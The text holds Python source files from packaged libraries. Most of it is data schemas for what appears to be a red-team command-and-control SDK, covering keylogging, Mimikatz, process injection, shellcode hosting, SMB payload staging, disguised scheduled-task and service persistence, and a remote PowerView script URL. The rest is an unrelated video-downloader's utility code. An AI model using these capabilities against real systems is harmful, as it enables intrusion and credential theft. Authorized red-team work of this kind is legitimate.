description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class KeylogGatherResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
keylog: Optional[BlobReferenceOrData] = Field(
{"id": "null", "size": 0},
description="Raw captured keystroke data",
example="EXAMPLE_KEYLOG_DATA",
title="Keylog",
)
class LinkResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
discovered: Optional[List[DiscoveredInstance]] = Field(
[],
description="Discovered instance from the link attempt",
example=[{"path": "mypipe1", "tag": "jPc4dpYI"}],
title="Discovered",
)
class ManagedModuleExecuteResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
output: Optional[str] = Field(
"",
description="Output from native module",
example="Custom output string",
title="Output",
)
class ManagedModuleLoadArguments(Schema):
version: Optional[DotNetFrameworkVersion] = Field(
"unknown",
description="Framework version for hosting (otherwise assumed from instance version)",
example="4",
)
module: BlobReferenceOrData = Field(
...,
description="Managed assembly to load (.NET DLL)",
example="MZ_EXAMPLE_MODULE",
title="Module",
)
class ManagedModuleLoadResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class ManagedModuleUnloadResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class MimikatzExecuteResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
output: Optional[str] = Field(
"",
description="Output from Mimikatz module",
example="mimikatz 2.1.1 (arch x64)\nWindows NT 10.0 build 2657 (arch x64)\nmsvc 190024215 1",
title="Output",
)
class MimikatzLoadResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class MinidumpResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class NamedPipeSendArguments(Schema):
host: str = Field(..., description="Hostname or IP address", example="ADAM-PC", title="Host")
pipe: str = Field(..., description="Named pipe for delivery", example="SvcPipe", title="Pipe")
data: BlobReferenceOrData = Field(..., description="Data to send", example="EXAMPLE_PIPE_DATA", title="Data")
timeout: Optional[int] = Field(0, description="Named pipe timeout in seconds", title="Timeout")
compress: Optional[bool] = Field(False, description="Compress data with zlib before sending", title="Compress")
wait: Optional[bool] = Field(False, description="Wait for pipe response data", title="Wait")
encryption_key: Optional[bytes] = Field(
"",
alias="encryptionKey",
description="Symetric key to encrypt with, ommit for no encryption",
title="Encryptionkey",
)
class NamedPipeSendResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
response: Optional[BlobReferenceOrData] = Field(
None,
description="Response from the remote pipe if requested",
example="EXAMPLE_PIPE_RESPONSE",
title="Response",
)
class NativeModuleExecuteResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
output: Optional[str] = Field(
"",
description="Output from native module",
example="Custom output string!",
title="Output",
)
class NativeModuleLoadArguments(Schema):
module: BlobReferenceOrData = Field(
...,
description="Native PE module to load (DLL)",
example="MZ_EXAMPLE_MODULE",
title="Module",
)
obfuscate: Optional[bool] = Field(
False,
description="Obfuscate module in memory between uses",
example=False,
title="Obfuscate",
)
class NativeModuleLoadResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class NativeModuleUnloadResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class NetworkConnectResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
hosts: Optional[List[str]] = Field(
[],
description="List of hosts in which connections succeeded",
example=["192.168.1.5", "192.168.1.6"],
title="Hosts",
)
class NetworkEnumerateSessionResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
sessions: Optional[List[SessionDetails]] = Field(
[],
description="List of session details",
example=[{"username": "Jason", "source": "SOURCE-PC", "active": 30, "idle": 15}],
title="Sessions",
)
class NetworkPingResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class NetworkResolveResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
dns_name: Optional[str] = Field(
None,
alias="dnsName",
description="Address provided via DNS resolution",
example="1.2.3.4",
title="Dnsname",
)
nbns_name: Optional[str] = Field(
None,
alias="nbnsName",
description="Address provided via NetBIOS resolution",
example="1.2.3.4",
title="Nbnsname",
)
class PayloadSeed(Schema):
tool: Tool = Field(..., description="Tool identifier")
name: str = Field(..., description="Payload name", title="Name")
profile: Optional[UUID] = Field(
None,
description="C2 profile to use (otherwise derive from current instance)",
title="Profile",
)
class PayloadWithData(Schema):
tool: Tool = Field(..., description="Tool identifier")
name: str = Field(..., description="Payload name", title="Name")
version: str = Field(..., description="Tool version", title="Version")
cached: datetime = Field(..., description="Payload cache time", title="Cached")
ext: str = Field(..., description="Original payload extension", title="Ext")
data: bytes = Field(..., description="Raw payload bytes", title="Data")
class PayloadWithMetadata(Schema):
tool: Tool = Field(..., description="Tool identifier")
name: str = Field(..., description="Payload name", title="Name")
version: str = Field(..., description="Tool version", title="Version")
cached: datetime = Field(..., description="Payload cache time", title="Cached")
class PowershellBaseResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class PowershellExecuteResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
output: Optional[str] = Field(
"",
description="Output from Powershell module",
example="\nName : ConsoleHost\nVersion : 5.1.19041.610\nInstanceId : 0484e4be-534a-4b4d-9ec2-a39109fbb490\n",
title="Output",
)
class PowershellLoadResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class PowershellStageArguments(Schema):
script: Optional[BlobReferenceOrData] = Field(
{"id": "null", "size": 0},
description="Script data to stage before all additional execution",
example="EXAMPLE_POSH_CODE",
title="Script",
)
script_url: Optional[str] = Field(
"",
alias="scriptUrl",
description="URL path for hosted script file",
example="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1",
title="Scripturl",
)
class PowershellStageResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class PowershellUnstageResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class ProcessExecuteBaseResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class ProcessListResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
processes: Optional[List[Process]] = Field(
[],
description="Complete list of queriable processes",
example=[
{"ppid": 0, "pid": 1, "sess": 0, "name": "System"},
{
"ppid": 567,
"pid": 321,
"sess": 1,
"arch": "x86",
"name": "chrome.exe",
"owner": "ACME\\John",
"path": "C:\\Google\\chrome.exe",
},
{
"ppid": 567,
"pid": 432,
"sess": 1,
"arch": "x64",
"name": "cmd.exe",
"owner": "ACME\\John",
"path": "C:\\Windows\\System32\\cmd.exe",
},
],
title="Processes",
)
class ProcessPowershellResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
output: Optional[str] = Field(
"",
description="Output from powershell.exe",
example="Major Minor Build Revision\n----- ----- ----- --------\n5 1 19041 1",
title="Output",
)
class ProcessShellResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
output: Optional[str] = Field(
"",
description="Output from cmd.exe",
example="Volume in drive C has no label.\nVolume Serial Number is 9ED1-36D3",
title="Output",
)
class ProcessStartResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class ProfileInResponse(Schema):
id: UUID = Field(..., title="Id")
tool: Tool
name: str = Field(..., max_length=265, title="Name")
data: Dict[str, Any] = Field(..., title="Data")
updated_at: datetime = Field(..., alias="updatedAt", title="Updatedat")
class RttPortalAccessInfo(Schema):
status: RttPortalAccessStatus
auth_url: Optional[str] = Field(
None,
alias="authUrl",
description="URL to finish device flow authentication",
title="Authurl",
)
class RegistryCreateArguments(Schema):
path: str = Field(
...,
description="Full registry path",
example="HKEY_LOCAL_MACHINE\\Software",
title="Path",
)
machine: Optional[str] = Field(
"",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
value: Optional[str] = Field("", description="Registry sub-value name", example="MyValue", title="Value")
vtype: Optional[RegistryType] = Field("REG_NONE", description="Value type", example="REG_DWORD")
data: Optional[str] = Field("", description="Registry value data", example="MyData", title="Data")
force: Optional[bool] = Field(
False,
description="Overwrite existing entry if required",
example=False,
title="Force",
)
class RegistryCreateResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class RegistryDeleteResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class RegistryQueryResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
keys: Optional[List[str]] = Field(
[],
description="Sub-keys of the queried root key",
example=[
"HKEY_LOCAL_MACHINE\\Software\\Corp\\Cat",
"HKEY_LOCAL_MACHINE\\Software\\Corp\\Dog",
],
title="Keys",
)
values: Optional[List[RegistryValue]] = Field(
[],
description="Sub-values of the queried root key",
example=[
{"name": "LastAction", "type": "REG_SZ", "data": "Meow"},
{"name": "MetaData", "type": "REG_BINARY", "data": "bWVvdw=="},
],
title="Values",
)
class ScheduledTaskCreateExArguments(Schema):
machine: Optional[str] = Field(
"",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
username: Optional[str] = Field(
"",
description="Username for authentication",
example="ACME\\Jason",
title="Username",
)
password: Optional[str] = Field(
"",
description="Password for authentication",
example="Password1",
title="Password",
)
folder: Optional[str] = Field(
"\\",
description="Parent folder for operation",
example="\\Microsoft\\",
title="Folder",
)
task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")
xml: BlobReferenceOrData = Field(
...,
description="Raw task XML data",
example="EXAMPLE_SCHTASKS_XML",
title="Xml",
)
class ScheduledTaskCreateExResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class ScheduledTaskCreateResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class ScheduledTaskDeleteResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class ScheduledTaskQueryResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
folders: Optional[List[str]] = Field(
[],
description="Sub-folders from query",
example=["\\Microsoft", "\\Intel"],
title="Folders",
)
tasks: Optional[List[TaskInfo]] = Field(
[],
description="Tasks results from query",
example=[
{
"path": "Adobe Acrobat Update Task",
"state": "ready",
"lastRun": "2001-05-04 03:02:01",
"lastResult": 0,
"xml": "<xml>Example Task Xml</xml>",
}
],
title="Tasks",
)
class ScheduledTaskStartResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class ScheduledTaskStopResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class ScreenshotResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
data: Optional[BlobReferenceOrData] = Field(
{"id": "null", "size": 0},
description="JPEG data from screen",
example="EXAMPLE_JPEG",
title="Data",
)
class ScriptInfo(Schema):
name: str = Field(..., description="Script name", title="Name")
type: ScriptType = Field(..., description="Script type")
cached: datetime = Field(..., description="Script cache time", title="Cached")
class ScriptOutput(Schema):
type: StdioType = Field(..., description="Stdio type", example="out")
message: str = Field(..., description="Message text", example="[+] Done.", title="Message")
class ServerScriptInfo(Schema):
name: str = Field(..., description="Script name", title="Name")
status: ServerScriptStatus = Field(..., description="Server script status")
env: Optional[Dict[str, str]] = Field({}, description="Saved ENV variables", title="Env")
output: Optional[List[ScriptOutput]] = Field(
[],
description="Script output entries",
example=[{"type": "out", "message": "[+] Done."}],
title="Output",
)
class ServiceConfigInCreate(Schema):
display_name: str = Field(..., alias="displayName", example="My Service", title="Displayname")
binary_path: str = Field(..., alias="binaryPath", example="C:\\Windows\\service.exe", title="Binarypath")
start_name: Optional[str] = Field(
"NT AUTHORITY\\SYSTEM",
alias="startName",
example="NT AUTHORITY\\SYSTEM",
title="Startname",
)
service_type: Optional[ServiceType] = Field("win32_own_process", alias="serviceType", example="win32_own_process")
start_type: Optional[ServiceStartType] = Field("demand_start", alias="startType", example="demand_start")
error_control: Optional[ServiceErrorControl] = Field("error_ignore", alias="errorControl", example="error_ignore")
name: str = Field(..., example="mysvc", title="Name")
class ServiceConfigInResponse(Schema):
display_name: str = Field(..., alias="displayName", example="My Service", title="Displayname")
binary_path: str = Field(..., alias="binaryPath", example="C:\\Windows\\service.exe", title="Binarypath")
start_name: Optional[str] = Field(
"NT AUTHORITY\\SYSTEM",
alias="startName",
example="NT AUTHORITY\\SYSTEM",
title="Startname",
)
service_type: Optional[ServiceType] = Field("win32_own_process", alias="serviceType", example="win32_own_process")
start_type: Optional[ServiceStartType] = Field("demand_start", alias="startType", example="demand_start")
error_control: Optional[ServiceErrorControl] = Field("error_ignore", alias="errorControl", example="error_ignore")
description: str = Field(..., example="Do secret things", title="Description")
load_order_group: str = Field(..., alias="loadOrderGroup", example="", title="Loadordergroup")
dependencies: List[str] = Field(..., example=["spoolsv"], title="Dependencies")
required_privileges: List[SePrivilege] = Field(..., alias="requiredPrivileges", example=["SeDebugPrivilege"])
process_id: Optional[int] = Field(0, alias="processId", example=1234, title="Processid")
exit_code: Optional[int] = Field(0, alias="exitCode", example=0, title="Exitcode")
current_state: Optional[ServiceState] = Field("stopped", alias="currentState", example="running")
class ServiceCreateExArguments(Schema):
machine: Optional[str] = Field(
"",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
config: ServiceConfigInCreate = Field(
...,
description="Service configuration",
example={
"displayName": "My Service",
"binaryPath": "C:\\Windows\\service.exe",
"startName": "NT AUTHORITY\\SYSTEM",
"serviceType": "win32_own_process",
"startType": "demand_start",
"errorControl": "error_ignore",
"name": "mysvc",
},
title="Config",
)
class ServiceCreateExResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class ServiceCreateResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class ServiceDeleteResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class ServiceModifyArguments(Schema):
machine: Optional[str] = Field(
"",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
service: str = Field(..., description="Service name", example="spoolsv", title="Service")
config: Optional[ServiceConfigInResponse] = Field(
None,
description="Service configuration",
example={
"displayName": "My Service",
"binaryPath": "C:\\Windows\\service.exe",
"startName": "NT AUTHORITY\\SYSTEM",
"serviceType": "win32_own_process",
"startType": "demand_start",
"errorControl": "error_ignore",
"description": "Do secret things",
"loadOrderGroup": "",
"dependencies": [],
"requiredPrivileges": ["SeDebugPrivilege"],
"processId": 0,
"exitCode": 0,
"currentState": "stopped",
},
title="Config",
)
class ServiceModifyResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class ServiceQueryResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
config: Optional[ServiceConfigInResponse] = Field(
None,
description="Full service configuration",
example={
"displayName": "My Service",
"binaryPath": "C:\\Windows\\service.exe",
"startName": "NT AUTHORITY\\SYSTEM",
"serviceType": "win32_own_process",
"startType": "demand_start",
"errorControl": "error_ignore",
"description": "Do secret things",
"loadOrderGroup": "",
"dependencies": ["spoolsv"],
"requiredPrivileges": ["SeDebugPrivilege"],
"processId": 1234,
"exitCode": 0,
"currentState": "running",
},
title="Config",
)
class ServiceStartResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class ServiceStopResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class ShareAddResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class ShareDeleteResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class ShareInfo(Schema):
remote: str = Field(
...,
description="Remote resource path",
example="\\\\REMOTE\\Data",
title="Remote",
)
local: Optional[str] = Field(
None,
description="Local resource path (drive letter)",
example="D:",
title="Local",
)
scope: ShareScope = Field(..., description="Resource scope", example="connected")
rtype: ShareType = Field(..., description="Resource type", example="disk")
dtype: ShareDisplayType = Field(..., description="Resource display type", example="share")
class ShareListResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
shares: Optional[List[ShareInfo]] = Field(
[],
description="Network shares in the current session",
example=[
{
"remote": "\\\\REMOTE\\C$",
"scope": "connected",
"rtype": "disk",
"dtype": "share",
},
{
"remote": "\\\\SERVER\\Data",
"local": "D:",
"scope": "remembered",
"rtype": "disk",
"dtype": "share",
},
],
title="Shares",
)
class SmbStageResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class TaskDetails(Schema):
id: UUID = Field(..., title="Id")
tool: Tool
command: str = Field(..., title="Command")
instance_id: Optional[UUID] = Field(None, alias="instanceId", title="Instanceid")
instance_tag: Optional[str] = Field(None, alias="instanceTag", title="Instancetag")
instance_name: Optional[str] = Field(None, alias="instanceName", title="Instancename")
owner_id: Optional[UUID] = Field(None, alias="ownerId", title="Ownerid")
owner: Optional[str] = Field(None, title="Owner")
created_at: datetime = Field(..., alias="createdAt", title="Createdat")
updated_at: datetime = Field(..., alias="updatedAt", title="Updatedat")
delivery: TaskDelivery
status: TaskStatus
context: TaskContext
arguments: TaskArguments
results: TaskResults
class Config:
extra = "allow"
class TasksWithCursor(Schema):
next_cursor: Optional[int] = Field(None, alias="nextCursor", title="Nextcursor")
tasks: List[TaskDetails] = Field(..., title="Tasks")
class UserInCreate(Schema):
username: str = Field(..., max_length=25, title="Username")
password: str = Field(..., max_length=100, title="Password")
role: UserRole
is_active: Optional[bool] = Field(True, alias="isActive", title="Isactive")
class UserInResponse(Schema):
id: UUID = Field(..., title="Id")
username: str = Field(..., max_length=25, title="Username")
role: UserRole
is_active: bool = Field(..., alias="isActive", title="Isactive")
class UserInUpdate(Schema):
username: Optional[str] = Field(None, max_length=25, title="Username")
password: Optional[str] = Field(None, max_length=100, title="Password")
role: Optional[UserRole] = None
is_active: Optional[bool] = Field(None, alias="isActive", title="Isactive")
class BlobReferenceOrPayloadOrData(Schema):
id: Optional[str] = Field(None, description="Blob identifier", title="Id")
name: Optional[str] = Field(None, description="Contextual name", title="Name")
data: Optional[bytes] = Field(None, description="Raw data", title="Data")
payload: Optional[PayloadSeed] = Field(None, description="Payload seed", title="Payload")
class ClientScriptResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
output: Optional[List[ScriptOutput]] = Field(
[],
description="Script output entries",
example=[{"type": "out", "message": "[+] Done."}],
title="Output",
)
class FileUploadArguments(Schema):
data: BlobReferenceOrPayloadOrData = Field(
..., description="File data to write", example="EXAMPLE_BLOB", title="Data"
)
path: str = Field(
...,
description="Remote file path (supports environment variables)",
example="C:\\Windows\\upload.ext",
title="Path",
)
force: Optional[bool] = Field(
False,
description="Overwrite the target file if needed",
example=False,
title="Force",
)
class HostShellcodeArguments(Schema):
srdi_exported_function: Optional[str] = Field(
"none",
alias="srdiExportedFunction",
description="Exported function to execute post load [sRDI]",
example="MyExport",
title="Srdiexportedfunction",
)
srdi_user_data: Optional[BlobReferenceOrData] = Field(
{"id": "null", "size": 0},
alias="srdiUserData",
description="User data to pass to exported function [sRDI]",
example="user_data",
title="Srdiuserdata",
)
srdi_flags: Optional[int] = Field(
0,
alias="srdiFlags",
description="Configuration flags for loading process [sRDI]",
title="Srdiflags",
)
encoding: Optional[HostingEncoding] = Field("base64", description="Encoding for binary data", example="base64")
base_url: Optional[str] = Field(
"",
alias="baseUrl",
description="Base URL (default is from profile)",
example="http://mycustom.com",
title="Baseurl",
)
endpoint: str = Field(
...,
description="Web endpoint path to host data",
example="/custom",
title="Endpoint",
)
payload: BlobReferenceOrPayloadOrData = Field(
...,
description="Payload or blob to convert to shellcode and host",
title="Payload",
)
class InjectArguments(Schema):
srdi_exported_function: Optional[str] = Field(
"none",
alias="srdiExportedFunction",
description="Exported function to execute post load [sRDI]",
example="MyExport",
title="Srdiexportedfunction",
)
srdi_user_data: Optional[BlobReferenceOrData] = Field(
{"id": "null", "size": 0},
alias="srdiUserData",
description="User data to pass to exported function [sRDI]",
example="user_data",
title="Srdiuserdata",
)
srdi_flags: Optional[int] = Field(
0,
alias="srdiFlags",
description="Configuration flags for loading process [sRDI]",
title="Srdiflags",
)
process: Optional[str] = Field(
"",
description="Process name/pid to inject into (otherwise local)",
example="explorer.exe",
title="Process",
)
payload: BlobReferenceOrPayloadOrData = Field(
...,
description="Payload data to inject",
example="EXAMPLE_PAYLOAD",
title="Payload",
)
technique: Optional[InjectionTechnique] = Field(
"standard", description="Injection technique/procedure", example="standard"
)
skip_conversion: Optional[bool] = Field(
False,
alias="skipConversion",
description="Skip sRDI conversion (payload is already shellcode)",
example=False,
title="Skipconversion",
)
class SmbStageArguments(Schema):
srdi_exported_function: Optional[str] = Field(
"none",
alias="srdiExportedFunction",
description="Exported function to execute post load [sRDI]",
example="MyExport",
title="Srdiexportedfunction",
)
srdi_user_data: Optional[BlobReferenceOrData] = Field(
{"id": "null", "size": 0},
alias="srdiUserData",
description="User data to pass to exported function [sRDI]",
example="user_data",
title="Srdiuserdata",
)
srdi_flags: Optional[int] = Field(
0,
alias="srdiFlags",
description="Configuration flags for loading process [sRDI]",
title="Srdiflags",
)
host: str = Field(..., description="Hostname or IP address", example="ADAM-PC", title="Host")
payload: BlobReferenceOrPayloadOrData = Field(
..., description="Payload to stage", example="EXAMPLE_PAYLOAD", title="Payload"
)
migrate: Optional[str] = Field(
"local",
description="Migrate to this process during stage (otherwise `local`)",
title="Migrate",
)
pipe: Optional[str] = Field(
"",
description="Named pipe for stage delivery (default = profile['stagers']['native']['pipe'])",
title="Pipe",
)
convert: Optional[bool] = Field(False, description="Convert to shellcode before delivery", title="Convert")
timeout: Optional[int] = Field(
0,
description="Named pipe timeout in seconds (default = profile['smb']['timeout'])",
title="Timeout",
)
class TransformPeCloneExports(Schema):
target: BlobReferenceOrPayloadOrData = Field(
...,
description="Target PE file data",
example="EXAMPLE_PAYLOAD",
title="Target",
)
reference: BlobReferenceOrData = Field(
...,
description="Reference PE file data",
example="EXAMPLE_BLOB",
title="Reference",
)
reference_path: str = Field(
...,
alias="referencePath",
description="Reference file path on disk during load",
example="C:\\Windows\\System32\\wkscli.dll",
title="Referencepath",
)
class TransformPeConvertToShellcode(Schema):
srdi_exported_function: Optional[str] = Field(
"none",
alias="srdiExportedFunction",
description="Exported function to execute post load [sRDI]",
example="MyExport",
title="Srdiexportedfunction",
)
srdi_user_data: Optional[BlobReferenceOrData] = Field(
{"id": "null", "size": 0},
alias="srdiUserData",
description="User data to pass to exported function [sRDI]",
example="user_data",
title="Srdiuserdata",
)
srdi_flags: Optional[int] = Field(
0,
alias="srdiFlags",
description="Configuration flags for loading process [sRDI]",
title="Srdiflags",
)
target: BlobReferenceOrPayloadOrData = Field(
...,
description="PE file data to convert",
example="EXAMPLE_PAYLOAD",
title="Target",
) | /rtt_sdk-0.2.0-py3-none-any.whl/rtt_sdk/models.py | 0.918663 | 0.17259 | models.py | pypi |
import contextlib
import os
import re
import sys
import urllib.parse
import tldextract
import validators
from rtv.exceptions import WrongUrlError
class DevNull:
"""
DevNull class that has a no-op write and flush method.
"""
def write(self, *args, **kwargs):
pass
def flush(self):
pass
@contextlib.contextmanager
def suppress_stdout():
"""
Context manager that suppresses stdout.
Examples:
>>> with suppress_stdout():
... print('Test print')
>>> print('test')
test
"""
save_stdout = sys.stdout
sys.stdout = DevNull()
yield
sys.stdout = save_stdout
def validate_url(url):
"""
Validate url using validators package.
Args:
url (str): Url.
Returns:
bool: True if valid, False otherwise.
Examples:
>>> validate_url('http://google.com')
True
>>> validate_url('http://google') # doctest: +ELLIPSIS
ValidationFailure(...)
>>> if not validate_url('http://google'):
... print('not valid')
not valid
"""
return validators.url(url)
def get_domain_name(url):
"""
Extract a domain name from the url (without subdomain).
Args:
url (str): Url.
Returns:
str: Domain name.
Raises:
DomainNotMatchedError: If url is wrong.
Examples:
>>> get_domain_name('https://vod.tvp.pl/video/')
'tvp.pl'
>>> get_domain_name('https://vod')
Traceback (most recent call last):
...
rtv.exceptions.WrongUrlError: Couldn't match domain name of this url: https://vod
"""
if not validate_url(url):
raise WrongUrlError(f'Couldn\'t match domain name of this url: {url}')
ext = tldextract.extract(url)
return f'{ext.domain}.{ext.suffix}'
def clean_video_data(_data):
"""
Clean video data:
-> cleans title
-> ...
Args:
_data (dict): Information about the video.
Returns:
dict: Refined video data.
"""
data = _data.copy()
# TODO: fix this ugliness
title = data.get('title')
if title:
data['title'] = clean_title(title)
return data
def clean_title(title):
"""
Clean title -> remove dates, remove duplicated spaces and strip title.
Args:
title (str): Title.
Returns:
str: Clean title without dates, duplicated, trailing and leading spaces.
"""
date_pattern = re.compile(r'\W*'
r'\d{1,2}'
r'[/\-.]'
r'\d{1,2}'
r'[/\-.]'
r'(?=\d*)(?:.{4}|.{2})'
r'\W*')
title = date_pattern.sub(' ', title)
title = re.sub(r'\s{2,}', ' ', title)
title = title.strip()
return title
def clean_filename(filename):
"""
Remove unsupported filename characters.
On Windows file names cannot contain any of \/:*?"<>| characters.
Effectively remove all characters except alphanumeric, -_#.,() and spaces.
Args:
filename (str): Name of a file.
Returns:
str: Filename without unsupported characters.
"""
return re.sub('[^\w\-_#.,() ]', '', filename)
def file_exists(path):
"""
Check whether a file exists.
Args:
path (str): Path to a file.
Returns:
bool: True if exists, False otherwise.
"""
return os.path.exists(path)
def get_ext(url):
"""
Extract an extension from the url.
Args:
url (str): String representation of a url.
Returns:
str: Filename extension from a url (without a dot), '' if extension is not present.
"""
parsed = urllib.parse.urlparse(url)
root, ext = os.path.splitext(parsed.path)
return ext.lstrip('.')
def delete_duplicates(seq):
"""
Remove duplicates from an iterable, preserving the order.
Args:
seq: Iterable of various type.
Returns:
list: List of unique objects.
"""
seen = set()
seen_add = seen.add
return [x for x in seq if not (x in seen or seen_add(x))] | /rtv-downloader-2.0.8.tar.gz/rtv-downloader-2.0.8/rtv/utils.py | 0.567098 | 0.254532 | utils.py | pypi |
import re
from typing import Any, ClassVar, Dict, List, Match, Optional
import requests
import youtube_dl
from bs4 import BeautifulSoup
from rtv.utils import get_domain_name, suppress_stdout
from rtv.video import Video
Entry = Dict[str, Any]
Entries = List[Entry]
class Extractor:
SITE_NAME: ClassVar[str]
_VALID_URL: ClassVar[str]
url: str
html: str
videos: List[Video]
response: requests.models.Response
def __init__(self, url: str) -> None:
self.url = url
self.videos = []
@classmethod
def validate_url(cls, url: str) -> Optional[Match[str]]:
"""Check if the Extractor can handle the given url."""
match = re.match(cls._VALID_URL, url)
return match
